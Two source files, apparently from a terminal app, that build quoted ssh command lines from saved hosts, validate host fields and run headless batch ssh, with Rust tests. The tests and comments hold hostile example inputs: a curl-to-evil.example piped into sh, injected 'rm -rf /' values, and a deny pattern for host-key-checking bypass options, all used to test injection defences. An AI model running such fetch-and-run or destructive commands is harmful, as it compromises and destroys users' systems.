File: src/lib/ssh.ts
/**
 * Building an ssh command line from a saved host.
 *
 * Pure by design (no store, no xterm, no IPC) so it is testable in isolation —
 * the same split as ptyExecShell.ts (strings) vs ptyExec.ts (side effects).
 *
 * THE THREAT MODEL: this string is TYPED INTO A LIVE INTERACTIVE SHELL. `ssh`
 * itself is not the risk; the shell in front of it is. `sanitizeCommand` blocks
 * control characters — it does nothing about `;`, `$( )`, backticks or `&&`.
 * Containment therefore comes from POSIX single-quoting EVERY interpolated
 * field, on top of the grammar validation the Rust command layer enforces.
 *
 * ARGUMENT ORDER IS LOAD-BEARING, not style: flags → target → remote script, so
 * that `detectNesting` → `firstNonFlag` recovers the target and the tab keeps
 * its remote context, title, and cwd suppression. `nesting.test.ts` pins it.
 */

import { firstNonFlag, tokenizeCommand } from "./nesting";
import { isWindows } from "./platform";
import type { SshHostInput } from "./types";

/** The fields that shape a command line — accepts a full `SshHost` too. */
export type SshSpec = Pick<
  SshHostInput,
  | "hostname"
  | "username"
  | "port"
  | "identity_file"
  | "jump_host"
  | "extra_args"
  | "remote_dir"
  | "post_connect"
>;

/** Longest line we will ever type; mirrors sanitizeCommand's own limit. */
const MAX_COMMAND_LEN = 4096;

/** Characters that never need quoting in any POSIX shell. `~` is deliberately
 *  absent — it must stay outside quotes to expand. */
const SHELL_SAFE = /^[A-Za-z0-9_@%+=:,./-]+$/;

/** Wrap for the shell unless provably unnecessary. Inside single quotes nothing
 *  expands, so the only escape needed is for the quote itself. */
export function shQuote(s: string): string {
  if (s === "") return "''";
  if (SHELL_SAFE.test(s)) return s;
  return `'${s.replace(/'/g, `'\\''`)}'`;
}

/** Quote a path while preserving tilde expansion: `~/'My Keys/id'` is a single
 *  word that the shell still expands, where `'~/My Keys/id'` would be handed to
 *  ssh with a literal tilde. */
export function quotePath(p: string): string {
  if (p === "~") return "~";
  if (p.startsWith("~/")) return `~/${shQuote(p.slice(2))}`;
  return shQuote(p);
}

/** `deploy@prod-01`, or just `prod-01` when no user is set. */
export function sshTarget(h: SshSpec): string {
  const user = h.username?.trim();
  const host = h.hostname.trim();
  return user ? `${user}@${host}` : host;
}

/** Human label for a palette hint or settings row: `deploy@prod-01:2222`. */
export function describeSshTarget(h: SshSpec): string {
  const port = h.port != null && h.port !== 22 ? `:${h.port}` : "";
  return `${sshTarget(h)}${port}`;
}

/**
 * The script to run on the far side, or null when a bare `ssh host` will do.
 *
 * `remote_dir` is quoted for the REMOTE shell; `post_connect` goes in verbatim
 * because operators (`&&`, `||`) are the entire point of that field. The caller
 * then applies ONE more shQuote for the LOCAL shell — which is why nothing in
 * `post_connect` can ever execute on this machine.
 *
 * The trailing `exec` is what keeps the session interactive instead of ssh
 * exiting the moment the script finishes.
 */
export function buildRemoteScript(h: SshSpec): string | null {
  const parts: string[] = [];
  const dir = h.remote_dir?.trim();
  const post = h.post_connect?.trim();
  if (dir) parts.push(`cd -- ${shQuote(dir)}`);
  if (post) parts.push(post);
  if (parts.length === 0) return null;
  parts.push(`exec "\${SHELL:-/bin/sh}" -l`);
  return parts.join("; ");
}

export function buildSshCommand(h: SshSpec): string {
  const script = buildRemoteScript(h);
  const args: string[] = ["ssh"];
  // A remote command suppresses tty allocation, which would break the prompt,
  // job control, and anything interactive the user then runs.
  if (script) args.push("-t");
  if (h.port != null) args.push("-p", String(h.port));
  if (h.identity_file?.trim()) args.push("-i", quotePath(h.identity_file.trim()));
  if (h.jump_host?.trim()) args.push("-J", shQuote(h.jump_host.trim()));
  if (h.extra_args?.trim()) {
    // Tokenized with the SAME quote-aware splitter that detectNesting uses,
    // then each token re-quoted: `-o "ProxyCommand=nc -X 5 %h %p"` survives as
    // one argument, while `; rm -rf /` becomes three literal arguments that ssh
    // rejects instead of three commands the shell runs.
    for (const token of tokenizeCommand(h.extra_args)) args.push(shQuote(token));
  }
  args.push(shQuote(sshTarget(h)));
  if (script) args.push(shQuote(script));
  return args.join(" ");
}

export interface FieldError {
  field: keyof SshHostInput | "command";
  message: string;
}

export function isWslIdentityPath(path: string): boolean {
  return (
    (path.startsWith("/") || path.startsWith("~/")) &&
    !path.includes("\\") &&
    !path.split("/").some((component) => component === "..")
  );
}

/** Frontend-side validation for inline form errors. The authoritative copy of
 *  these rules lives in `commands/ssh_hosts.rs::validate` — a row can be edited
 *  in the DB or arrive from the importer, so this layer is convenience only. */
export function validateSshHost(h: SshHostInput): FieldError[] {
  const errors: FieldError[] = [];
  const controlChars = /[\x00-\x1f\x7f]/;

  const label = h.label?.trim() ?? "";
  if (!label) errors.push({ field: "label", message: "A label is required." });
  else if (label.length > 64) errors.push({ field: "label", message: "Max 64 characters." });

  const hostname = h.hostname?.trim() ?? "";
  if (!hostname) {
    errors.push({ field: "hostname", message: "A hostname or IP address is required." });
  } else if (!isValidHostname(hostname)) {
    errors.push({ field: "hostname", message: `"${hostname}" is not a valid hostname or IP.` });
  }

  const username = h.username?.trim();
  if (username && !/^[A-Za-z0-9._][A-Za-z0-9._-]{0,31}$/.test(username)) {
    errors.push({ field: "username", message: `"${username}" is not a valid username.` });
  }

  if (h.port != null && (!Number.isInteger(h.port) || h.port < 1 || h.port > 65535)) {
    errors.push({ field: "port", message: "Port must be between 1 and 65535." });
  }

  const identity = h.identity_file?.trim();
  if (identity && isWindows() && !isWslIdentityPath(identity)) {
    errors.push({
      field: "identity_file",
      message: "Use a Linux path inside the default WSL distribution.",
    });
  }

  const extra = h.extra_args?.trim();
  if (extra) {
    if (/(stricthostkeychecking|userknownhostsfile|checkhostip|globalknownhostsfile)/i.test(extra)) {
      errors.push({
        field: "extra_args",
        message:
          "Host-key checking options aren't allowed — they disable the warning you get when a server's identity changes.",
      });
    } else if (firstNonFlag(tokenizeCommand(extra), 0) !== null) {
      errors.push({
        field: "extra_args",
        message: "Every option must be a flag — a bare word here is read as the hostname.",
      });
    }
  }

  for (const field of [
    "identity_file",
    "jump_host",
    "extra_args",
    "remote_dir",
    "post_connect",
    "label",
    "hostname",
    "username",
  ] as const) {
    const v = h[field];
    if (typeof v === "string" && controlChars.test(v)) {
      errors.push({ field, message: "Control characters aren't allowed." });
    }
  }

  // Catch an over-long line in the form rather than at connect time.
  if (errors.length === 0 && buildSshCommand(h).length > MAX_COMMAND_LEN) {
    errors.push({
      field: "command",
      message: `The resulting command exceeds ${MAX_COMMAND_LEN} characters.`,
    });
  }

  return errors;
}

function isValidHostname(h: string): boolean {
  if (h.length > 255) return false;
  if (h.startsWith("[") && h.endsWith("]")) {
    const inner = h.slice(1, -1);
    return inner.length > 0 && /^[0-9A-Fa-f:.]+$/.test(inner);
  }
  return /^[A-Za-z0-9]([A-Za-z0-9._-]*[A-Za-z0-9])?$/.test(h);
}

File: src-tauri/src/scheduled/ssh.rs
//! `ssh -o BatchMode=yes …` for headless remote runs.
//!
//! This is a genuinely new capability for the app and it is scoped tightly.
//! `src/lib/sshConnect.ts` explains why the interactive path types `ssh …` into a
//! login shell instead of spawning ssh: the tab survives `exit`, shell
//! integration keeps working, OSC 133 blocks keep being emitted, and
//! `detectNesting` gives remote awareness for free. A **captured batch run needs
//! none of those** — it gets the exit code and the output directly — so the
//! trade is worth making here and only here.
//!
//! Four rules make it safe, and each has a test:
//!
//! 1. **The forced options come FIRST.** ssh takes the first value it obtains for
//!    any option, so a saved `extra_args` containing `-o BatchMode=no` cannot
//!    re-enable an interactive prompt.
//! 2. **`StrictHostKeyChecking` is never forced, in either direction.** Under
//!    `BatchMode=yes` an unknown host key fails closed with "Host key
//!    verification failed" — the correct unattended outcome and an error the user
//!    can act on. `commands::ssh_hosts::is_host_key_bypass` still refuses the
//!    options that would weaken it, on the host row itself.
//! 3. **No password path exists here at all.** `BatchMode=yes` disables
//!    interactive authentication by construction, `validate` refuses a
//!    password-only host at save time, and this module never touches the
//!    credential vault. `sshpass` would put plaintext in an argv; a server-side
//!    expect harness would recreate the frontend's byte observer, whose entire
//!    point is that the secret goes vault → PTY without ever crossing IPC.
//! 4. **The remote script is quoted exactly ONCE for the local login shell.**
//!    `exec::run_command` runs `shell -lc <command>`, and `remote_dir` /
//!    `post_connect` are free text from the user's own host row. That single outer
//!    quote is what keeps them from ever having a LOCAL interpretation — the same
//!    guarantee `src/lib/ssh.ts` relies on.

use super::validate::HostFacts;
use crate::agent::run::CommandWrapper;
use crate::database::queries::SshHost;

/// Options forced onto every batch connection, in this order.
///
/// `BatchMode=yes` refuses every interactive prompt; `RequestTTY=no` keeps the
/// remote from allocating a terminal a captured run cannot drive; the keepalives
/// stop a silent connection from hanging a run until its wall-clock budget.
const FORCED_OPTIONS: &[&str] = &[
    "-o",
    "BatchMode=yes",
    "-o",
    "RequestTTY=no",
    "-o",
    "ConnectTimeout=10",
    "-o",
    "ServerAliveInterval=15",
    "-o",
    "ServerAliveCountMax=3",
];

/// A snapshot of the host row taken at fire time. Snapshotted rather than
/// re-read per command so a mid-run edit cannot redirect the second half of a run
/// to a different machine.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct RemoteBatchTarget {
    pub host_id: String,
    pub label: String,
    pub hostname: String,
    pub username: Option<String>,
    pub port: Option<u16>,
    pub identity_file: Option<String>,
    pub jump_host: Option<String>,
    pub extra_args: Option<String>,
    pub remote_dir: Option<String>,
    pub post_connect: Option<String>,
}

impl RemoteBatchTarget {
    pub fn from_host(host: &SshHost) -> Self {
        Self {
            host_id: host.id.clone(),
            label: host.label.clone(),
            hostname: host.hostname.clone(),
            username: non_empty(host.username.as_deref()),
            port: host.port,
            identity_file: non_empty(host.identity_file.as_deref()),
            jump_host: non_empty(host.jump_host.as_deref()),
            extra_args: non_empty(host.extra_args.as_deref()),
            remote_dir: non_empty(host.remote_dir.as_deref()),
            post_connect: non_empty(host.post_connect.as_deref()),
        }
    }

    pub fn facts(&self, has_password: bool) -> HostFacts {
        HostFacts {
            id: self.host_id.clone(),
            label: self.label.clone(),
            has_password,
            has_identity_file: self.identity_file.is_some(),
            extra_args: self.extra_args.clone(),
        }
    }

    /// `user@host`, the way ssh wants it.
    pub fn target(&self) -> String {
        match &self.username {
            Some(user) => format!("{user}@{}", self.hostname),
            None => self.hostname.clone(),
        }
    }

    /// The script that runs on the far side: an optional `cd`, the host's own
    /// `post_connect`, then the command.
    ///
    /// `post_connect` goes in verbatim because shell operators are the entire
    /// point of that field — and it is safe for exactly the reason the frontend's
    /// builder is safe: the whole thing is quoted once more for the LOCAL shell
    /// below, so nothing in it can ever execute on this machine.
    fn remote_script(&self, command: &str) -> String {
        let mut parts: Vec<String> = Vec::new();
        if let Some(dir) = &self.remote_dir {
            parts.push(format!("cd -- {}", sh_quote(dir)));
        }
        if let Some(post) = &self.post_connect {
            parts.push(post.clone());
        }
        parts.push(command.to_string());
        parts.join("; ")
    }
}

impl CommandWrapper for RemoteBatchTarget {
    fn wrap(&self, command: &str) -> Result<String, String> {
        if command.chars().any(|c| c.is_control()) {
            return Err("a remote command cannot contain control characters".into());
        }
        if self.hostname.trim().is_empty() {
            return Err("the saved host has no hostname".into());
        }
        let mut argv: Vec<String> = vec!["ssh".to_string()];
        argv.extend(FORCED_OPTIONS.iter().map(|s| s.to_string()));
        if let Some(port) = self.port {
            argv.push("-p".into());
            argv.push(port.to_string());
        }
        if let Some(identity) = &self.identity_file {
            argv.push("-i".into());
            argv.push(sh_quote(identity));
        }
        if let Some(jump) = &self.jump_host {
            argv.push("-J".into());
            argv.push(sh_quote(jump));
        }
        if let Some(extra) = &self.extra_args {
            // Tokenized and re-quoted individually, matching what the frontend's
            // `tokenizeCommand` + `shQuote` pair does. A blind splice would let a
            // quote in the saved field escape into the local shell.
            let tokens = shlex::split(extra)
                .ok_or_else(|| "the host's extra ssh arguments could not be parsed".to_string())?;
            for token in tokens {
                if token.chars().any(|c| c.is_control()) {
                    return Err("the host's extra ssh arguments contain control characters".into());
                }
                argv.push(sh_quote(&token));
            }
        }
        argv.push(sh_quote(&self.target()));
        argv.push("--".into());
        // The single outer quote. Everything the user's host row contributed is
        // inside it, so none of it has a local interpretation.
        argv.push(sh_quote(&self.remote_script(command)));
        Ok(argv.join(" "))
    }

    fn describe(&self) -> String {
        format!(
            "{} ({}) over ssh, non-interactive",
            self.label,
            self.target()
        )
    }
}

fn non_empty(value: Option<&str>) -> Option<String> {
    value
        .map(str::trim)
        .filter(|v| !v.is_empty())
        .map(str::to_string)
}

/// POSIX single-quoting, the same rule as `shQuote` in `src/lib/ssh.ts`: wrap in
/// single quotes and replace each embedded quote with `'\''`.
fn sh_quote(value: &str) -> String {
    format!("'{}'", value.replace('\'', "'\\''"))
}

#[cfg(test)]
mod tests {
    use super::*;

    fn host() -> RemoteBatchTarget {
        RemoteBatchTarget {
            host_id: "h1".into(),
            label: "prod-01".into(),
            hostname: "prod-01.example.test".into(),
            username: Some("deploy".into()),
            port: Some(2222),
            identity_file: Some("/Users/me/.ssh/id_ed25519".into()),
            jump_host: None,
            extra_args: None,
            remote_dir: None,
            post_connect: None,
        }
    }

    #[test]
    fn batch_mode_is_the_first_option_so_extra_args_cannot_override_it() {
        let mut h = host();
        h.extra_args = Some("-o BatchMode=no -o RequestTTY=yes".into());
        let line = h.wrap("df -h").unwrap();
        let batch_yes = line.find("BatchMode=yes").expect("forced option missing");
        let batch_no = line.find("BatchMode=no").expect("extra arg missing");
        assert!(
            batch_yes < batch_no,
            "ssh takes the FIRST value it obtains; forced options must precede extra_args:\n{line}"
        );
        let tty_no = line.find("RequestTTY=no").unwrap();
        let tty_yes = line.find("RequestTTY=yes").unwrap();
        assert!(tty_no < tty_yes, "{line}");
    }

    #[test]
    fn the_builder_never_emits_stricthostkeychecking_or_sshpass() {
        let mut h = host();
        h.remote_dir = Some("/srv/app".into());
        h.post_connect = Some("source .env && echo ready".into());
        let line = h.wrap("systemctl is-active app").unwrap();
        let lower = line.to_ascii_lowercase();
        // Under BatchMode an unknown key fails closed, which is the outcome we
        // want. Forcing either value would be wrong: `accept-new` is the very
        // bypass `is_host_key_bypass` rejects, and forcing `yes` would duplicate
        // the default while inviting someone to "fix" it later.
        assert!(!lower.contains("stricthostkeychecking"), "{line}");
        assert!(!lower.contains("userknownhostsfile"), "{line}");
        // No credential path exists here at all.
        assert!(!lower.contains("sshpass"), "{line}");
        assert!(!lower.contains("askpass"), "{line}");
        assert!(!lower.contains("password"), "{line}");
    }

    #[test]
    fn no_tty_is_requested() {
        let line = host().wrap("uptime").unwrap();
        assert!(line.contains("-o RequestTTY=no"), "{line}");
        assert!(
            !line.contains(" -t "),
            "a batch run must never allocate a tty: {line}"
        );
    }

    #[test]
    fn the_remote_script_is_quoted_once_for_the_local_login_shell() {
        let mut h = host();
        // The adversarial case: a host row whose `post_connect` would be a command
        // substitution if it ever reached the LOCAL shell unquoted.
        h.post_connect = Some("$(curl -s https://evil.example/x | sh)".into());
        h.remote_dir = Some("/srv/it's here".into());
        let line = h.wrap("echo done").unwrap();
        // Exactly one quoted region carries the whole remote script, and the
        // dangerous text is inside it.
        let start = line.find("-- '").expect("the script must follow `--`");
        let script = &line[start + 4..];
        assert!(script.contains("curl -s https://evil.example/x"), "{line}");
        // The embedded apostrophe is escaped rather than closing the quote early.
        assert!(line.contains(r"'\''"), "{line}");
        // And the script region is the LAST thing on the line, so nothing the
        // host row contributed can be read as a local operator.
        assert!(line.ends_with('\''), "{line}");
    }

    #[test]
    fn a_command_with_control_characters_is_refused() {
        assert!(host().wrap("echo hi\rrm -rf /").is_err());
        let mut h = host();
        h.extra_args = Some("-o Foo=\u{1b}bar".into());
        assert!(h.wrap("uptime").is_err());
    }

    #[test]
    fn unparseable_extra_args_fail_rather_than_being_spliced_blindly() {
        let mut h = host();
        h.extra_args = Some("-o 'Unterminated".into());
        assert!(h.wrap("uptime").is_err());
    }

    #[test]
    fn the_port_identity_and_jump_host_are_all_carried_and_quoted() {
        let mut h = host();
        h.jump_host = Some("bastion.example.test".into());
        let line = h.wrap("uptime").unwrap();
        assert!(line.contains("-p 2222"), "{line}");
        assert!(line.contains("-i '/Users/me/.ssh/id_ed25519'"), "{line}");
        assert!(line.contains("-J 'bastion.example.test'"), "{line}");
        assert!(line.contains("'deploy@prod-01.example.test'"), "{line}");
    }

    #[test]
    fn a_host_with_no_hostname_is_refused() {
        let mut h = host();
        h.hostname = "   ".into();
        assert!(h.wrap("uptime").is_err());
    }

    #[test]
    fn describe_names_the_machine_for_the_run_record() {
        let described = host().describe();
        assert!(described.contains("prod-01"));
        assert!(described.contains("deploy@prod-01.example.test"));
    }
}
